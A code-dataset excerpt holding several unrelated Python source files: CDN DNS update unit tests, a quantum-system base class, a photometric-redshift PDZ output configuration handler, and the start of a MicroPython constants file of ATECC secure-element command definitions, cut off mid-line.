name='myservice',\n domains=domains_new,\n origins=[],\n flavor_id='standard')\n\n responders = [{\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'links': [\n {\n 'domain': u'test.domain.com',\n 'href': u'test.domain.com.global.prod.fastly.net',\n 'rel': 'access_url'\n }\n ]}\n }]\n\n dns_details = self.controller.update(self.service_old,\n service_updates,\n responders)\n access_urls_map = {}\n for provider_name in dns_details:\n access_urls_map[provider_name] = {}\n access_urls_list = dns_details[provider_name]['access_urls']\n for access_urls in access_urls_list:\n access_urls_map[provider_name][access_urls['domain']] = (\n access_urls['operator_url'])\n\n for responder in responders:\n for provider_name in responder:\n for domain_new in domains_new:\n self.assertIsNotNone(\n access_urls_map[provider_name][domain_new.domain])\n\n def test_update_same_domains(self):\n service_updates = service.Service(\n service_id=self.service_old.service_id,\n name='myservice',\n domains=self.domains_old,\n origins=[],\n flavor_id='standard')\n\n responders = [{\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'links': [\n {\n 'domain': u'blog.domain.com',\n 'href': u'blog.domain.com.global.prod.fastly.net',\n 'rel': 'access_url'\n },\n {\n 'domain': u'test.domain.com',\n 'href': u'test.domain.com.global.prod.fastly.net',\n 'rel': 'access_url'\n }\n ]}\n }]\n\n dns_details = self.controller.update(self.service_old,\n service_updates,\n responders)\n access_urls_map = {}\n for provider_name in dns_details:\n access_urls_map[provider_name] = {}\n access_urls_list = dns_details[provider_name]['access_urls']\n for access_urls in access_urls_list:\n access_urls_map[provider_name][access_urls['domain']] = (\n access_urls['operator_url'])\n\n for responder in responders:\n for provider_name in responder:\n for domain_old in self.domains_old:\n self.assertIsNotNone(\n access_urls_map[provider_name][domain_old.domain])\n\n def test_update_add_domains(self):\n subdomain = mock.Mock()\n subdomain.add_records = mock.Mock()\n\n domains_new = [domain.Domain('test.domain.com'),\n domain.Domain('blog.domain.com'),\n domain.Domain('pictures.domain.com')]\n\n service_new = service.Service(\n service_id=self.service_old.service_id,\n name='myservice',\n domains=domains_new,\n origins=[],\n flavor_id='standard')\n\n responders = [{\n 'Fastly': {\n 'id': str(uuid.uuid4()),\n 'links': [\n {\n 'domain': u'test.domain.com',\n 'href': u'test.domain.com.global.prod.fastly.net',\n 'rel': 'access_url'\n },\n {\n 'domain': u'blog.domain.com',\n 'href': u'blog.domain.com.global.prod.fastly.net',\n 'rel': 'access_url'\n },\n {\n 'domain': u'pictures.domain.com',\n 'href': u'pictures.domain.com.global.prod.fastly.net',\n 'rel': 'access_url'\n }\n ]}\n }]\n\n dns_details = self.controller.update(\n self.service_old,\n service_new,\n responders\n )\n access_urls_map = {}\n for provider_name in dns_details:\n access_urls_map[provider_name] = {}\n access_urls_list = dns_details[provider_name]['access_urls']\n for access_urls in access_urls_list:\n access_urls_map[provider_name][access_urls['domain']] = (\n access_urls['operator_url'])\n\n for responder in responders:\n for provider_name in responder:\n for domain_new in domains_new:\n self.assertIsNotNone(\n access_urls_map[provider_name][domain_new.domain])\n","sub_path":"tests/unit/dns/default/test_services.py","file_name":"test_services.py","file_ext":"py","file_size_in_byte":13090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"446692906","text":"from quantum_systems.system_helper import (\n transform_one_body_elements,\n transform_two_body_elements,\n)\n\n\nclass QuantumSystem:\n \"\"\"Base class defining some of the common methods used by all the different\n quantum systems.\n \"\"\"\n\n def __init__(self, n, l, np=None):\n assert n <= l\n\n if np is None:\n import numpy as np\n\n self.np = np\n\n self.n = n\n self.l = l\n self.m = self.l - self.n\n\n self.o = slice(0, self.n)\n self.v = slice(self.n, self.l)\n\n self._h = None\n self._f = None\n self._u = None\n self._s = None\n self._dipole_moment = None\n\n self._time_evolution_operator = None\n\n self._spf = None\n self._bra_spf = None\n\n self._nuclear_repulsion_energy = None\n\n def setup_system(self):\n pass\n\n def construct_fock_matrix(self, h, u, f=None):\n \"\"\"Function setting up the Fock matrix\"\"\"\n np = self.np\n o, v = (self.o, self.v)\n\n if f is None:\n f = np.zeros_like(h)\n\n f.fill(0)\n f += np.einsum(\"piqi -> pq\", u[:, o, :, o])\n f += h\n\n return f\n\n def cast_to_complex(self):\n np = self.np\n\n self._h = self._h.astype(np.complex128)\n self._u = self._u.astype(np.complex128)\n\n if self._f is not None:\n self._f = self._f.astype(np.complex128)\n\n def change_basis(self, c, c_tilde=None):\n self._h = transform_one_body_elements(\n self._h, c, np=self.np, c_tilde=c_tilde\n )\n\n if self._dipole_moment is not None:\n for i in range(self._dipole_moment.shape[0]):\n self._dipole_moment[i] = transform_one_body_elements(\n self._dipole_moment[i], c, np=self.np, c_tilde=c_tilde\n )\n\n self._u = transform_two_body_elements(\n self._u, c, np=self.np, c_tilde=c_tilde\n )\n self._f = self.construct_fock_matrix(self._h, self._u)\n\n if self._spf is not None:\n if c_tilde is not None:\n # In case of bi-orthogonal basis sets, we create an extra set\n # of single-particle functions for the bra-side\n self._bra_spf = self.np.tensordot(\n c_tilde,\n self._spf.conj()\n if self._bra_spf is None\n else self._bra_spf,\n axes=((1), (0)),\n )\n\n self._spf = self.np.tensordot(c, self._spf, axes=((0), (0)))\n\n def change_to_hf_basis(self, *args, verbose=False, **kwargs):\n from tdhf import HartreeFock\n\n hf = HartreeFock(system=self, verbose=verbose, np=self.np)\n c = hf.scf(*args, **kwargs)\n self.change_basis(c)\n\n @property\n def h(self):\n \"\"\"Getter returning one-body matrix\"\"\"\n return self._h\n\n @property\n def f(self):\n \"\"\"Getter returning one-body Fock matrix\"\"\"\n return self._f\n\n @f.setter\n def f(self, f):\n self._f = f\n\n @property\n def u(self):\n \"\"\"Getter returning the antisymmetric two-body matrix\"\"\"\n return self._u\n\n @property\n def s(self):\n \"\"\"Getter returning the overlap matrix of the atomic orbitals\"\"\"\n np = self.np\n\n if self._s is None:\n self._s = np.eye(*self._h.shape)\n\n return self._s\n\n @property\n def dipole_moment(self):\n return self._dipole_moment\n\n @property\n def spf(self):\n \"\"\"Getter returning the single particle functions, i.e, the eigenstates\n of the non-interacting Hamiltonian\"\"\"\n return self._spf\n\n @property\n def bra_spf(self):\n \"\"\"Getter returning the conjugate single particle functions. This is\n None, unless we are working with a bi-variational basis.\"\"\"\n if self._bra_spf is None:\n self._bra_spf = self._spf.conj()\n\n return self._bra_spf\n\n @property\n def nuclear_repulsion_energy(self):\n return self._nuclear_repulsion_energy\n\n def get_transformed_h(self, c):\n return transform_one_body_elements(self._h, c, np=self.np)\n\n def get_transformed_u(self, c):\n return transform_two_body_elements(self._u, c, np=self.np)\n\n def set_time_evolution_operator(self, time_evolution_operator):\n self._time_evolution_operator = time_evolution_operator\n self._time_evolution_operator.set_system(self)\n\n def h_t(self, current_time):\n if self._time_evolution_operator is None:\n return self._h\n\n return self._time_evolution_operator.h_t(current_time)\n\n def u_t(self, current_time):\n if self._time_evolution_operator is None:\n return self._u\n\n return self._time_evolution_operator.u_t(current_time)\n","sub_path":"quantum_systems/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"134707080","text":"\"\"\"\nCreated on: 06/04/18\nAuthor: Nikolaos Apostolakos\n\"\"\"\n\nfrom __future__ import division, print_function\n\nimport nnpz.io.output_column_providers as ocp\nfrom nnpz.config import (ConfigManager, OutputHandlerConfig, TargetCatalogConfig,\n ReferenceConfig)\nfrom nnpz.io.output_hdul_providers.PdzBins import PdzBins\n\n\nclass PdzOutputConfig(ConfigManager.ConfigHandler):\n\n def __init__(self):\n self.__added = False\n\n def __addColumnProvider(self, args):\n target_ids = ConfigManager.getHandler(TargetCatalogConfig).parseArgs(args)['target_ids']\n ref_options = ConfigManager.getHandler(ReferenceConfig).parseArgs(args)\n ref_ids = ref_options['reference_ids']\n\n # First handle the case where we have a reference sample directory. In\n # this case the PDZ is the weighted co-add of the sample PDZs.\n if 'reference_sample' in ref_options:\n ref_sample = ref_options['reference_sample']\n pdz_prov = ocp.CoaddedPdz(len(target_ids), ref_sample, ref_ids)\n\n # Now we handle the case where we have a reference catalog. In this case\n # the PDZ is the normalized histogram of the neighbors redshifts.\n if 'reference_redshift' in ref_options:\n ref_z = ref_options['reference_redshift']\n pdz_prov = ocp.TrueRedshiftPdz(len(target_ids), ref_z, 0, 6, 601)\n\n output = ConfigManager.getHandler(OutputHandlerConfig).parseArgs(args)['output_handler']\n output.addColumnProvider(pdz_prov)\n\n pdz_quantiles = args.get('pdz_quantiles', [])\n pdz_mc_samples = args.get('pdz_mc_samples', 0)\n pdf_sampling = ocp.PdfSampling(pdz_prov, quantiles=pdz_quantiles, mc_samples=pdz_mc_samples)\n output.addColumnProvider(pdf_sampling)\n output.addHeaderProvider(pdf_sampling)\n\n # Add point estimates\n if 'pdz_point_estimates' in args:\n output.addColumnProvider(ocp.PdzPointEstimates(pdz_prov, args['pdz_point_estimates']))\n\n output.addExtensionTableProvider(PdzBins(pdz_prov))\n\n def parseArgs(self, args):\n if not self.__added:\n self.__addColumnProvider(args)\n self.__added = True\n return {}\n\n\nConfigManager.addHandler(PdzOutputConfig)","sub_path":"nnpz/config/PdzOutputConfig.py","file_name":"PdzOutputConfig.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"468545941","text":"# -*- coding: utf-8 -*-\r\n# pylint: disable=E0401\r\nfrom micropython import const\r\n\r\n\r\n\"\"\" command definitions \"\"\"\r\n# minimum number of bytes in command (from count byte to second CRC byte)\r\nATCA_CMD_SIZE_MIN = const(7)\r\n# maximum size of command packet (Verify)\r\nATCA_CMD_SIZE_MAX = const(4 * 36 + 7)\r\n# status byte for success\r\nCMD_STATUS_SUCCESS = const(0x00)\r\n# status byte after wake-up\r\nCMD_STATUS_WAKEUP = const(0x11)\r\n# command parse error\r\nCMD_STATUS_BYTE_PARSE = const(0x03)\r\n# command ECC error\r\nCMD_STATUS_BYTE_ECC = const(0x05)\r\n# command execution error\r\nCMD_STATUS_BYTE_EXEC = const(0x0F)\r\n# communication error\r\nCMD_STATUS_BYTE_COMM = const(0xFF)\r\n\r\n\r\n\"\"\" name opcodes for ATATECC Commands \"\"\"\r\n# CheckMac command op-code\r\nATCA_CHECKMAC = const(0x28)\r\n# DeriveKey command op-code\r\nATCA_DERIVE_KEY = const(0x1C)\r\n# Info command op-code\r\nATCA_INFO = const(0x30)\r\n# GenDig command op-code\r\nATCA_GENDIG = const(0x15)\r\n# GenKey command op-code\r\nATCA_GENKEY = const(0x40)\r\n# HMAC command op-code\r\nATCA_HMAC = const(0x11)\r\n# Lock command op-code\r\nATCA_LOCK = const(0x17)\r\n# MAC command op-code\r\nATCA_MAC = const(0x08)\r\n# Nonce command op-code\r\nATCA_NONCE = const(0x16)\r\n# Pause command op-code\r\nATCA_PAUSE = const(0x01)\r\n# PrivWrite command op-code\r\nATCA_PRIVWRITE = const(0x46)\r\n# Random command op-code\r\nATCA_RANDOM = const(0x1B)\r\n# Read command op-code\r\nATCA_READ = const(0x02)\r\n# Sign command op-code\r\nATCA_SIGN = const(0x41)\r\n# UpdateExtra command op-code\r\nATCA_UPDATE_EXTRA = const(0x20)\r\n# GenKey command op-code\r\nATCA_VERIFY = const(0x45)\r\n# Write command op-code\r\nATCA_WRITE = const(0x12)\r\n# ECDH command op-code\r\nATCA_ECDH = const(0x43)\r\n# Counter command op-code\r\nATCA_COUNTER = const(0x24)\r\n# SHA command op-code\r\nATCA_SHA = const(0x47)\r\n# AES command op-code\r\nATCA_AES = const(0x51)\r\n# KDF command op-code\r\nATCA_KDF = const(0x56)\r\n# Secure Boot command op-code\r\nATCA_SECUREBOOT = const(0x80)\r\n# Self test command op-code\r\nATCA_SELFTEST = const(0x77)\r\n\r\n\r\n\"\"\" name Definitions of Data and Packet Sizes \"\"\"\r\n# size of a symmetric SHA key\r\nATCA_KEY_SIZE = const(32)\r\n# size of a block\r\nATCA_BLOCK_SIZE = const(32)\r\n# size of a word\r\nATCA_WORD_SIZE = const(4)\r\n# size of the public key pad\r\nATCA_PUB_KEY_PAD = const(4)\r\n# number of bytes in the device serial number\r\nATCA_SERIAL_NUM_SIZE = const(9)\r\n# size of response packet containing four bytes of data\r\nATCA_RSP_SIZE_VAL = const(7)\r\n# number of keys\r\nATCA_KEY_COUNT = const(16)\r\n# size of configuration zone\r\nATCA_ECC_CONFIG_SIZE = const(128)\r\n# size of configuration zone\r\nATCA_SHA_CONFIG_SIZE = const(88)\r\n# size of OTP zone\r\nATCA_OTP_SIZE = const(64)\r\n# size of data zone\r\nATCA_DATA_SIZE = const(ATCA_KEY_COUNT * ATCA_KEY_SIZE)\r\n# size of GFM data\r\nATCA_AES_GFM_SIZE = const(ATCA_BLOCK_SIZE)\r\n\r\n# ChipMode byte offset within the configuration zone\r\nATCA_CHIPMODE_OFFSET = const(19)\r\n# ChipMode I2C Address in UserExtraAdd flag\r\nATCA_CHIPMODE_I2C_ADDRESS_FLAG = const(0x01)\r\n# ChipMode TTLenable flag\r\nATCA_CHIPMODE_TTL_ENABLE_FLAG = const(0x02)\r\n# ChipMode watchdog duration mask\r\nATCA_CHIPMODE_WATCHDOG_MASK = const(0x04)\r\n# ChipMode short watchdog (~1.3s)\r\nATCA_CHIPMODE_WATCHDOG_SHORT = const(0x00)\r\n# ChipMode long watchdog (~13s)\r\nATCA_CHIPMODE_WATCHDOG_LONG = const(0x04)\r\n# ChipMode clock divider mask\r\nATCA_CHIPMODE_CLOCK_DIV_MASK = const(0xF8)\r\n# ChipMode clock divider M0\r\nATCA_CHIPMODE_CLOCK_DIV_M0 = const(0x00)\r\n# ChipMode clock divider M1\r\nATCA_CHIPMODE_CLOCK_DIV_M1 = const(0x28)\r\n# ChipMode clock divider M2\r\nATCA_CHIPMODE_CLOCK_DIV_M2 = const(0x68)\r\n\r\n# Number of bytes in the command packet Count\r\nATCA_COUNT_SIZE = const(1)\r\n# Number of bytes in the command packet CRC\r\nATCA_CRC_SIZE = const(2)\r\n# Number of bytes in the command packet\r\nATCA_PACKET_OVERHEAD = const(ATCA_COUNT_SIZE + ATCA_CRC_SIZE)\r\n\r\n# size of a p256 public key\r\nATCA_PUB_KEY_SIZE = const(64)\r\n# size of a p256 private key\r\nATCA_PRIV_KEY_SIZE = const(32)\r\n# size of a p256 signature\r\nATCA_SIG_SIZE = const(64)\r\n# size of a RSA private key\r\nRSA2048_KEY_SIZE = const(256)\r\n\r\n# minimum number of bytes in response\r\nATCA_RSP_SIZE_MIN = const(4)\r\n# size of response packet containing 4 bytes data\r\nATCA_RSP_SIZE_4 = const(7)\r\n# size of response packet containing 64 bytes data\r\nATCA_RSP_SIZE_72 = const(75)\r\n# size of response packet containing 64 bytes data\r\nATCA_RSP_SIZE_64 = const(67)\r\n# size of response packet containing 32 bytes data\r\nATCA_RSP_SIZE_32 = const(35)\r\n# size of response packet containing 16 bytes data\r\nATCA_RSP_SIZE_16 = const(19)\r\n# maximum size of response packet (GenKey and Verify command)\r\nATCA_RSP_SIZE_MAX = const(75)\r\n\r\n# Size of the OutNonce response expected from several commands\r\nOUTNONCE_SIZE = const(32)\r\n\r\n\"\"\" name Definitions for Command Parameter Ranges \"\"\"\r\n# maximum value for key id\r\nATCA_KEY_ID_MAX = const(15)\r\n# maximum value for OTP block\r\nATCA_OTP_BLOCK_MAX = const(1)\r\n\r\n\"\"\" name Definitions for Indexes Common to All Commands \"\"\"\r\n# command packet index for count\r\nATCA_COUNT_IDX = const(0)\r\n# command packet index for op-code\r\nATCA_OPCODE_IDX = const(1)\r\n# command packet index for first parameter\r\nATCA_PARAM1_IDX = const(2)\r\n# command packet index for second parameter\r\nATCA_PARAM2_IDX = const(3)\r\n# command packet index for data load\r\nATCA_DATA_IDX = const(5)\r\n# buffer index of data in response\r\nATCA_RSP_DATA_IDX = const(1)\r\n\r\n\"\"\" name Definitions for Zone and Address Parameters \"\"\"\r\n# Configuration zone\r\nATCA_ZONE_CONFIG = const(0x00)\r\n# OTP (One Time Programming) zone\r\nATCA_ZONE_OTP = const(0x01)\r\n# Data zone\r\nATCA_ZONE_DATA = const(0x02)\r\n# Zone mask\r\nATCA_ZONE_MASK = const(0x03)\r\n# Zone bit 6 set: Write is encrypted with an unlocked data zone.\r\nATCA_ZONE_ENCRYPTED = const(0x40)\r\n# Zone bit 7 set: Access 32 bytes, otherwise 4 bytes.\r\nATCA_ZONE_READWRITE_32 = const(0x80)\r\n# Address bits 5 to 7 are 0 for Configuration zone.\r\nATCA_ADDRESS_MASK_CONFIG = const(0x001F)\r\n# Address bits 4 to 7 are 0 for OTP zone.\r\nATCA_ADDRESS_MASK_OTP = const(0x000F)\r\n# Address bit 7 to 15 are always 0.\r\nATCA_ADDRESS_MASK = const(0x007F)\r\n# KeyID when referencing TempKey\r\nATCA_TEMPKEY_KEYID = const(0xFFFF)\r\n\r\n\"\"\" name Definitions for Key types \"\"\"\r\n# B283 NIST ECC key\r\nATCA_B283_KEY_TYPE = const(0)\r\n# K283 NIST ECC key\r\nATCA_K283_KEY_TYPE = const(1)\r\n# P256 NIST ECC key\r\nATCA_P256_KEY_TYPE = const(4)\r\n# AES-128 Key\r\nATCA_AES_KEY_TYPE = const(6)\r\n# SHA key or other data\r\nATCA_SHA_KEY_TYPE = const(7)\r\n\r\n\"\"\" name Definitions for the AES Command \"\"\"\r\n# AES command index for mode\r\nAES_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# AES command index for key id\r\nAES_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# AES command index for input data\r\nAES_INPUT_IDX = const(ATCA_DATA_IDX)\r\n# AES command packet size\r\nAES_COUNT = const(23)\r\n# AES mode bits 3 to 5 are 0\r\nAES_MODE_MASK = const(0xC7)\r\n# AES mode mask for key block field\r\nAES_MODE_KEY_BLOCK_MASK = const(0xC0)\r\n# AES mode operation mask\r\nAES_MODE_OP_MASK = const(0x07)\r\n# AES mode: Encrypt\r\nAES_MODE_ENCRYPT = const(0x00)\r\n# AES mode: Decrypt\r\nAES_MODE_DECRYPT = const(0x01)\r\n# AES mode: GFM calculation\r\nAES_MODE_GFM = const(0x03)\r\n# Bit shift for key block in mode\r\nAES_MODE_KEY_BLOCK_POS = const(6)\r\n# size of AES encrypt/decrypt data\r\nAES_DATA_SIZE = const(16)\r\n# AES command response packet size\r\nAES_RSP_SIZE = const(ATCA_RSP_SIZE_16)\r\n\r\n\"\"\" name Definitions for the CheckMac Command \"\"\"\r\n# CheckMAC command index for mode\r\nCHECKMAC_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# CheckMAC command index for key identifier\r\nCHECKMAC_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# CheckMAC command index for client challenge\r\nCHECKMAC_CLIENT_CHALLENGE_IDX = const(ATCA_DATA_IDX)\r\n# CheckMAC command index for client response\r\nCHECKMAC_CLIENT_RESPONSE_IDX = const(37)\r\n# CheckMAC command index for other data\r\nCHECKMAC_DATA_IDX = const(69)\r\n# CheckMAC command packet size\r\nCHECKMAC_COUNT = const(84)\r\n# CheckMAC mode\t 0: first SHA block from key id\r\nCHECKMAC_MODE_CHALLENGE = const(0x00)\r\n# CheckMAC mode bit 0: second SHA block from TempKey\r\nCHECKMAC_MODE_BLOCK2_TEMPKEY = const(0x01)\r\n# CheckMAC mode bit 1: first SHA block from TempKey\r\nCHECKMAC_MODE_BLOCK1_TEMPKEY = const(0x02)\r\n# CheckMAC mode bit 2: match TempKey.SourceFlag\r\nCHECKMAC_MODE_SOURCE_FLAG_MATCH = const(0x04)\r\n# CheckMAC mode bit 5: include first 64 OTP bits\r\nCHECKMAC_MODE_INCLUDE_OTP_64 = const(0x20)\r\n# CheckMAC mode bits 3, 4, 6, and 7 are 0.\r\nCHECKMAC_MODE_MASK = const(0x27)\r\n# CheckMAC size of client challenge\r\nCHECKMAC_CLIENT_CHALLENGE_SIZE = const(32)\r\n# CheckMAC size of client response\r\nCHECKMAC_CLIENT_RESPONSE_SIZE = const(32)\r\n# CheckMAC size of \"other data\"\r\nCHECKMAC_OTHER_DATA_SIZE = const(13)\r\n# CheckMAC size of client command header size inside \"other data\"\r\nCHECKMAC_CLIENT_COMMAND_SIZE = const(4)\r\n# CheckMAC return value when there is a match\r\nCHECKMAC_CMD_MATCH = const(0)\r\n# CheckMAC return value when there is a mismatch\r\nCHECKMAC_CMD_MISMATCH = const(1)\r\n# CheckMAC response packet size\r\nCHECKMAC_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the Counter command \"\"\"\r\nCOUNTER_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Counter command index for mode\r\nCOUNTER_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# Counter command index for key id\r\nCOUNTER_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# Counter mode bits 1 to 7 are 0\r\nCOUNTER_MODE_MASK = const(0x01)\r\n# Counter maximum value of the counter\r\nCOUNTER_MAX_VALUE = const(2097151)\r\n# Counter command mode for reading\r\nCOUNTER_MODE_READ = const(0x00)\r\n# Counter command mode for incrementing\r\nCOUNTER_MODE_INCREMENT = const(0x01)\r\n# Counter command response packet size\r\nCOUNTER_RSP_SIZE = const(ATCA_RSP_SIZE_4)\r\n\r\n\r\n\"\"\" name Definitions for the DeriveKey Command \"\"\"\r\n# DeriveKey command index for random bit\r\nDERIVE_KEY_RANDOM_IDX = const(ATCA_PARAM1_IDX)\r\n# DeriveKey command index for target slot\r\nDERIVE_KEY_TARGETKEY_IDX = const(ATCA_PARAM2_IDX)\r\n# DeriveKey command index for optional MAC\r\nDERIVE_KEY_MAC_IDX = const(ATCA_DATA_IDX)\r\n# DeriveKey command packet size without MAC\r\nDERIVE_KEY_COUNT_SMALL = const(ATCA_CMD_SIZE_MIN)\r\n# DeriveKey command mode set to 4 as in datasheet\r\nDERIVE_KEY_MODE = const(0x04)\r\n# DeriveKey command packet size with MAC\r\nDERIVE_KEY_COUNT_LARGE = const(39)\r\n# DeriveKey 1. parameter; has to match TempKey.SourceFlag\r\nDERIVE_KEY_RANDOM_FLAG = const(4)\r\n# DeriveKey MAC size\r\nDERIVE_KEY_MAC_SIZE = const(32)\r\n# DeriveKey response packet size\r\nDERIVE_KEY_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the ECDH Command \"\"\"\r\nECDH_PREFIX_MODE = const(0x00)\r\nECDH_COUNT = const(ATCA_CMD_SIZE_MIN + ATCA_PUB_KEY_SIZE)\r\nECDH_MODE_SOURCE_MASK = const(0x01)\r\nECDH_MODE_SOURCE_EEPROM_SLOT = const(0x00)\r\nECDH_MODE_SOURCE_TEMPKEY = const(0x01)\r\nECDH_MODE_OUTPUT_MASK = const(0x02)\r\nECDH_MODE_OUTPUT_CLEAR = const(0x00)\r\nECDH_MODE_OUTPUT_ENC = const(0x02)\r\nECDH_MODE_COPY_MASK = const(0x0C)\r\nECDH_MODE_COPY_COMPATIBLE = const(0x00)\r\nECDH_MODE_COPY_EEPROM_SLOT = const(0x04)\r\nECDH_MODE_COPY_TEMP_KEY = const(0x08)\r\nECDH_MODE_COPY_OUTPUT_BUFFER = const(0x0C)\r\n# ECDH output data size\r\nECDH_KEY_SIZE = const(ATCA_BLOCK_SIZE)\r\n# ECDH command packet size\r\nECDH_RSP_SIZE = const(ATCA_RSP_SIZE_64)\r\n\r\n\r\n\"\"\" name Definitions for the GenDig Command \"\"\"\r\n# GenDig command index for zone\r\nGENDIG_ZONE_IDX = const(ATCA_PARAM1_IDX)\r\n# GenDig command index for key id\r\nGENDIG_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# GenDig command index for optional data\r\nGENDIG_DATA_IDX = const(ATCA_DATA_IDX)\r\n# GenDig command packet size without \"other data\"\r\nGENDIG_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# GenDig zone id config. Use KeyID to specify any of the four 256-bit blocks of the Configuration zone.\r\nGENDIG_ZONE_CONFIG = const(0)\r\n# GenDig zone id OTP. Use KeyID to specify either the first or second 256-bit block of the OTP zone.\r\nGENDIG_ZONE_OTP = const(1)\r\n# GenDig zone id data. Use KeyID to specify a slot in the Data zone or a transport key in the hardware array.\r\nGENDIG_ZONE_DATA = const(2)\r\n# GenDig zone id shared nonce. KeyID specifies the location of the input value in the message generation.\r\nGENDIG_ZONE_SHARED_NONCE = const(3)\r\n# GenDig zone id counter. KeyID specifies the monotonic counter ID to be included in the message generation.\r\nGENDIG_ZONE_COUNTER = const(4)\r\n# GenDig zone id key config. KeyID specifies the slot for which the configuration information is to be included in the message generation.\r\nGENDIG_ZONE_KEY_CONFIG = const(5)\r\n# GenDig command response packet size\r\nGENDIG_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the GenKey Command \"\"\"\r\n# GenKey command index for mode\r\nGENKEY_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# GenKey command index for key id\r\nGENKEY_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# GenKey command index for other data\r\nGENKEY_DATA_IDX = const(5)\r\n# GenKey command packet size without \"other data\"\r\nGENKEY_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# GenKey command packet size with \"other data\"\r\nGENKEY_COUNT_DATA = const(10)\r\n# GenKey size of \"other data\"\r\nGENKEY_OTHER_DATA_SIZE = const(3)\r\n# GenKey mode bits 0 to 1 and 5 to 7 are 0\r\nGENKEY_MODE_MASK = const(0x1C)\r\n# GenKey mode: private key generation\r\nGENKEY_MODE_PRIVATE = const(0x04)\r\n# GenKey mode: public key calculation\r\nGENKEY_MODE_PUBLIC = const(0x00)\r\n# GenKey mode: PubKey digest will be created after the public key is calculated\r\nGENKEY_MODE_DIGEST = const(0x08)\r\n# GenKey mode: Calculate PubKey digest on the public key in KeyId\r\nGENKEY_MODE_PUBKEY_DIGEST = const(0x10)\r\n# GenKey Create private key and store to tempkey (608 only)\r\nGENKEY_PRIVATE_TO_TEMPKEY = const(0xFFFF)\r\n# GenKey response packet size in Digest mode\r\nGENKEY_RSP_SIZE_SHORT = const(ATCA_RSP_SIZE_MIN)\r\n# GenKey response packet size when returning a public key\r\nGENKEY_RSP_SIZE_LONG = const(ATCA_RSP_SIZE_72)\r\n\r\n\r\n\"\"\" name Definitions for the HMAC Command \"\"\"\r\n# HMAC command index for mode\r\nHMAC_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# HMAC command index for key id\r\nHMAC_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# HMAC command packet size\r\nHMAC_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# HMAC mode bit 2: The value of this bit must match the value in TempKey.SourceFlag or the command will return an error.\r\nHMAC_MODE_FLAG_TK_RAND = const(0x00)\r\n# HMAC mode bit 2: The value of this bit must match the value in TempKey.SourceFlag or the command will return an error.\r\nHMAC_MODE_FLAG_TK_NORAND = const(0x04)\r\n# HMAC mode bit 4: Include the first 88 OTP bits (OTP[0] through OTP[10]) in the message.; otherwise, the corresponding message bits are set to zero. Not applicable for ATECC508A.\r\nHMAC_MODE_FLAG_OTP88 = const(0x10)\r\n# HMAC mode bit 5: Include the first 64 OTP bits (OTP[0] through OTP[7]) in the message.; otherwise, the corresponding message bits are set to zero. If Mode[4] is set, the value of this mode bit is ignored. Not applicable for ATECC508A.\r\nHMAC_MODE_FLAG_OTP64 = const(0x20)\r\n# HMAC mode bit 6: If set, include the 48 bits SN[2:3] and SN[4:7] in the message.; otherwise, the corresponding message bits are set to zero.\r\nHMAC_MODE_FLAG_FULLSN = const(0x40)\r\n# HMAC mode bits 0, 1, 3, and 7 are 0.\r\nHMAC_MODE_MASK = const(0x74)\r\n# HMAC size of digest response\r\nHMAC_DIGEST_SIZE = const(32)\r\n# HMAC command response packet size\r\nHMAC_RSP_SIZE = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the Info Command \"\"\"\r\n# Info command index for 1. parameter\r\nINFO_PARAM1_IDX = const(ATCA_PARAM1_IDX)\r\n# Info command index for 2. parameter\r\nINFO_PARAM2_IDX = const(ATCA_PARAM2_IDX)\r\n# Info command packet size\r\nINFO_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Info mode Revision\r\nINFO_MODE_REVISION = const(0x00)\r\n# Info mode KeyValid\r\nINFO_MODE_KEY_VALID = const(0x01)\r\n# Info mode State\r\nINFO_MODE_STATE = const(0x02)\r\n# Info mode GPIO\r\nINFO_MODE_GPIO = const(0x03)\r\n# Info mode GPIO\r\nINFO_MODE_VOL_KEY_PERMIT = const(0x04)\r\n# Info mode maximum value\r\nINFO_MODE_MAX = const(0x03)\r\n# Info mode is not the state mode.\r\nINFO_NO_STATE = const(0x00)\r\n# Info output state mask\r\nINFO_OUTPUT_STATE_MASK = const(0x01)\r\n# Info driver state mask\r\nINFO_DRIVER_STATE_MASK = const(0x02)\r\n# Info param2 to set the persistent latch state.\r\nINFO_PARAM2_SET_LATCH_STATE = const(0x0002)\r\n# Info param2 to set the persistent latch\r\nINFO_PARAM2_LATCH_SET = const(0x0001)\r\n# Info param2 to clear the persistent latch\r\nINFO_PARAM2_LATCH_CLEAR = const(0x0000)\r\n# Info return size\r\nINFO_SIZE = const(0x04)\r\n# Info command response packet size\r\nINFO_RSP_SIZE = const(ATCA_RSP_SIZE_VAL)\r\n\r\n\r\n\"\"\" name Definitions for the KDF Command \"\"\"\r\n# KDF command index for mode\r\nKDF_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# KDF command index for key id\r\nKDF_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# 